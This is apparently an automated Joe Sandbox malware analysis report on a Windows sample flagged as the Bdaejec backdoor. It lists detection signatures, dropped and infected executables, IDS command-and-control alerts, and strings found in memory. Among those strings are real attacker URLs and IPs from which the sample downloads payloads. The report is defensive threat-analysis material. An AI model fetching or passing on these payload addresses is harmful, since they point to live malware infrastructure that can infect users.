Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5vrRrFN56j.exe

Overview

General Information

Sample name:5vrRrFN56j.exe
renamed because original name is a hash value
Original sample name:5ad1a67084ee167d59560fbaec7529fe.exe
Analysis ID:1589499
MD5:5ad1a67084ee167d59560fbaec7529fe
SHA1:9bc3b2a106eb0a8281bfa47baeeb0369d87f8036
SHA256:ddd4a05ff6d0d64d56f4e49d9afbcaa80d20304163797f08f5f18804e73f795e
Tags:exeuser-abuse_ch
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Yara detected aPLib compressed binary
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • 5vrRrFN56j.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\5vrRrFN56j.exe" MD5: 5AD1A67084EE167D59560FBAEC7529FE)
    • WIJSmB.exe (PID: 6768 cmdline: C:\Users\user\AppData\Local\Temp\WIJSmB.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 7396 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
5vrRrFN56j.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\update.exeCN_Honker_WordpressScannerSample from CN Honker Pentest Toolset - file WordpressScanner.exeFlorian Roth
    • 0xd571c:$s0: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    • 0xe8368:$s1: (http://www.eyuyan.com)
    • 0xcbd6c:$s2: GetConnectString
    • 0xe2cd4:$s4: #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000000.2064107799.00000000006CD000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        Process Memory Space: 5vrRrFN56j.exe PID: 1896JoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          Process Memory Space: WIJSmB.exe PID: 6768JoeSecurity_BdaejecYara detected BdaejecJoe Security
            SourceRuleDescriptionAuthorStrings
            0.0.5vrRrFN56j.exe.6e8260.2.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.0.5vrRrFN56j.exe.71e03c.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                0.2.5vrRrFN56j.exe.71e03c.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  0.2.5vrRrFN56j.exe.6e8260.3.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                    0.0.5vrRrFN56j.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-12T17:37:04.331518+010020283713Unknown Traffic192.168.2.549704103.235.47.188443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-12T17:37:03.582373+010028079081Malware Command and Control Activity Detected192.168.2.54970544.221.84.105799TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-12T17:37:02.998602+010028385221Malware Command and Control Activity Detected192.168.2.5503701.1.1.153UDP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 5vrRrFN56j.exeAvira: detected
                      Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k1.raryFAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k2.rarDAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k2.rar?pAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k1.rarAcrobatAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k1.rarQAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net/Avira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k1.rarDAvira URL Cloud: Label: malware
                      Source: http://47.92.98.180:88/MQNT/MQNT.exeAvira URL Cloud: Label: malware
                      Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
                      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
                      Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
                      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeReversingLabs: Detection: 97%
                      Source: C:\Users\user\Desktop\update.exeReversingLabs: Detection: 50%
                      Source: 5vrRrFN56j.exeReversingLabs: Detection: 94%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\update.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
                      Source: 5vrRrFN56j.exeJoe Sandbox ML: detected
                      Source: 5vrRrFN56j.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

                      Spreading

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_004A29E2
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_004A2B8C
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.5:50370 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49705 -> 44.221.84.105:799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
                      Source: global trafficTCP traffic: 192.168.2.5:49705 -> 44.221.84.105:799
                      Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                      Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
                      Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 103.235.47.188:443
                      Source: global trafficHTTP traffic detected: HEAD / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveAccept: text/html, application/xhtml+xml, */*Accept-Encoding: identityAccept-Language: zh-cnUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: www.baidu.com
                      Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_004A1099
                      Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
                      Source: global trafficDNS traffic detected: DNS query: www.baidu.com
                      Source: WIJSmB.exe, 00000001.00000003.2065758471.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://47.92.98.180:18081/myauth/web/getUserCount?skey=c0ecd8de-75e7-47a6-a22b-8adedbf78780&apikey=c
                      Source: update.exe.0.drString found in binary or memory: http://47.92.98.180:88/MQNT/GX_RZ.txt
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://47.92.98.180:88/MQNT/MQNT.exe
                      Source: 5vrRrFN56j.exe, update.exe.0.drString found in binary or memory: http://47.92.98.180:88/MQNT/data.txt
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
                      Source: WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarAcrobat
                      Source: WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarD
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarQ
                      Source: WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raryF
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
                      Source: WIJSmB.exe, 00000001.00000002.2333336401.000000000141A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar?p
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarD
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://ip-api.com/json/?lang=zh-CN
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://q1.qlogo.cn/g?b=qq&nk=
                      Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://whois.pconline.com.cn/ipJson.jsp?json=true
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://www.eyuyan.com
                      Source: 5vrRrFN56j.exe, update.exe.0.drString found in binary or memory: http://www.eyuyan.com)DVarFileInfo$
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://www.eyuyan.comservice
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://www.ibsensoftware.com/
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://www.ip138.com
                      Source: 5vrRrFN56j.exeString found in binary or memory: http://www.ip138.comUser-Agent:
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
                      Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://api.ip.sb/ip
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://cdid.c-ctrip.com/model-poc2/h
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://cdid.c-ctrip.com/model-poc2/hhttps://ip.cn/api/index?ip=&type=0User-Agent:
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://club.vip.qq.com/api/aggregation?g_tk=
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://club.vip.qq.com/api/aggregation?g_tk=content-type:
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://ip.cn/api/index?ip=&type=0
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://ipinfo.io/json
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://www.baidu.com
                      Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
                      Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://www.uc.cn/ip
                      Source: 5vrRrFN56j.exeString found in binary or memory: https://www.uc.cn/ipIP:https://api.ip.sb/iphttps://ipinfo.io/jsonip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_a03d4125-9

                      System Summary

                      barindex
                      Source: C:\Users\user\Desktop\update.exe, type: DROPPEDMatched rule: Sample from CN Honker Pentest Toolset - file WordpressScanner.exe Author: Florian Roth
                      Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
                      Source: WIJSmB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A60761_2_004A6076
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A6D001_2_004A6D00
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\WIJSmB.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656
                      Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                      Source: 5vrRrFN56j.exe, 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXY.HWSS.dllf# vs 5vrRrFN56j.exe
                      Source: 5vrRrFN56j.exe, 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexy.WSS.HTTPS.dllp( vs 5vrRrFN56j.exe
                      Source: 5vrRrFN56j.exeBinary or memory string: OriginalFilenameXY.HWSS.dllf# vs 5vrRrFN56j.exe
                      Source: 5vrRrFN56j.exeBinary or memory string: OriginalFilenamexy.WSS.HTTPS.dllp( vs 5vrRrFN56j.exe
                      Source: 5vrRrFN56j.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\update.exe, type: DROPPEDMatched rule: CN_Honker_WordpressScanner date = 2015-06-23, author = Florian Roth, description = Sample from CN Honker Pentest Toolset - file WordpressScanner.exe, score = 0b3c5015ba3616cbc616fc9ba805fea73e98bc83, reference = Disclosed CN Honker Pentest Toolset, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: WIJSmB.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: WIJSmB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: WIJSmB.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/14@2/2
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_004A119F
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile created: C:\Users\user\Desktop\update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6768
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile created: C:\Users\user\AppData\Local\Temp\WIJSmB.exeJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 5vrRrFN56j.exeReversingLabs: Detection: 94%
                      Source: unknownProcess created: C:\Users\user\Desktop\5vrRrFN56j.exe "C:\Users\user\Desktop\5vrRrFN56j.exe"
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeProcess created: C:\Users\user\AppData\Local\Temp\WIJSmB.exe C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeProcess created: C:\Users\user\AppData\Local\Temp\WIJSmB.exe C:\Users\user\AppData\Local\Temp\WIJSmB.exeJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: avifil32.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: urlmon.dllJump to behavior
